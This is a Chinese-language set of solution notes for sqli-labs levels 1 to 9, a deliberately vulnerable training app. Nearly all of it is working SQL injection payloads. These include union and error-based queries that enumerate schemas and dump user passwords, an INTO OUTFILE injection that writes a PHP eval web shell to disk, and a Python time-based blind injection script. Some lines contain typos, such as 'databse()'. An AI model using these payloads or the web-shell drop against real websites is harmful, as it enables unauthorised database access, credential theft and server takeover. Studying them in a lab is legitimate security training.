?id=1 and 1=1 //显示正常
?id=1 and 1=2 //显示正常
//不是数字型注入
?id=1' //出现错误,为单引号字符型注入
//判断字段数
?id=1' order by 4//出现错误,为4字段大
?id=' union select 1,2,3--+
//爆当前数据库
?id=' union select 1,database(),3--+
//爆所有数据库
?id=' union select 1,(select group_concat(schema_name)from information_schema.schemata),3--+
//爆指定数据库的所有表
?id=' union select 1,(select group_concat(table_name)from information_schema.tables where table_schema='security'),3--+
//爆指定表的所有列
?id=' union select 1,(select group_concat(column_name)from information_schema.columns where table_name='users'),3--+
//爆指定一列
?id=' union select 1,(select group_concat(password) from users),3--+
less-2(整型注入)
?id=1 and 1=1 //显示正常
?id=1 and 1=2 //显示错误
//注入
?id=1 and 1=2 union select 1,2,3--+、
//下面同1
less-3(单引号括号字符串注入)
?id=1 and 1=1 //显示正常
?id=1 and 1=2 //显示正常
//不是数字型注入
?id=1' //报错,查看错误可看出少个括号
?id=1') //报错
?id=i')--+ //显示正常
?id=') union select 1,2,3--+
//下面同1
less-4(双引号括号字符串注入)
?id=1 and 1=1 //显示正常
?id=1 and 1=2 //显示正常
//不是数字型注入
?id=1' //正常
?id=1" //错误,根据错误看出少一个括号
?id=1")//错误
?id=1")--+//显示正常
?id=") union select 1,2,3--+
//下面同1
less-5(单引号报错注入)
?id=1 //正常
?id=1'//错误
?id=1--+//正常
?id=1' order by 1.2.3.4//4的时候出现错误
?id=' union select 1,2,3--+//无回显
//尝试使用报错回显
?id=' and extractvalue(0x23,concat(0x23,database(),0x23))--+
//爆表
?id=' and extractvalue(0x23,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x23))--+
//爆列名
?id=' and extractvalue(0x23,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x23))--+
//爆数据
?id=' and extractvalue(0x23,concat(0x23,(select password from users order by id limit 1,1),0x23))--+
less-6(双引号报错注入)
?id=1 //正常
?id=1' //正常
?id=1" //错误
?id=1"--+//正常
?id=1" order by 1,2,3,4 //4的时候出现错误
?id=" union select 1,2,3--+//无回显
/尝试使用报错回显
?id=" and extractvalue(0x23,concat(0x23,database(),0x23))--+
//爆表名
?id=" and extractvalue(0x23,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x23))--+
//爆列名
?id=" and extractvalue(0x23,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x23))--+
//爆数据
?id=" and extractvalue(0x23,concat(0x23,(select password from users order by id limit 1,1),0x23))--+
less-7(文件导出)
?id=1 //正常
?id=1' //错误
?id=1'--+//错误
?id=1') //错误
?id=1')--+ //错误
?id=1')) //错误
?id=1'))--+ //正常
?id=1')) order by 1,2,3,4--+ //出现错误
?id=')) union select 1,2,3--+//无回显
//根据提示,进行文件导出
?id=')) union select 1,2,'<?php eval($_REQUEST[23]); ?>' into outfile 'D://1.php' --+
less-8(布尔型单引号盲注)
?id=1 //正常
?id=1' //错误
?id=1' --+ //正常 无回显
?id=' and if(length(databse())=8,sleep(5),sleep(1)) //延迟盲注
?id=' and if(substr(database(),1,1)='s',sleep(5),sleep(1)) //判断databse()第一个字母
?id=' and if(substr(database(),2,1)='se',sleep(5),sleep(1)) //判断databse()前两个字母,以此类推
//也可写脚本,burp,sqlmap进行爆破
//脚本
import requests
import datetime
import time
def len():
for i in range(1,10):
url='http://localhost/sqli-labs/Less-9/'
payload="?id=1' and if(length(database())=%s,sleep(1),0)--+" % i
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
timeout = (time2 - time1).seconds
if timeout <= 1:
print(i)
else:
print(i)
break
print('len:',i)
def database_name():
name = ''
for i in range(1,10):
for j in '0123456789abcdefghijklmnopqrstuvwxyz':
url='http://localhost/sqli-labs/Less-9/'
payload="?id=1' and if(substr(database(),%d,1)='%s',sleep(5),1)--+" % (i, j)
time1 = datetime.datetime.now()
r = requests.get(url + payload)
time2 = datetime.datetime.now()
timeout = (time2 - time1).seconds
if timeout >= 5:
name+=j
print(name)
break
print("database_name:",name)
if __name__ == '__main__':
len()
database_name()
less-9(基于时间的单引号盲注)
?id=' and if(length(databse())=8,sleep(5),sleep(1)) //延迟盲注
?id=' and if(substr(database(),1,1)='s',sleep(5),sleep(1)) //判断databse()第一个字母
?id=' and if(substr(database(),2,1)='se',sleep(5),sleep(1)) //判断databse()前两个字母,以此类推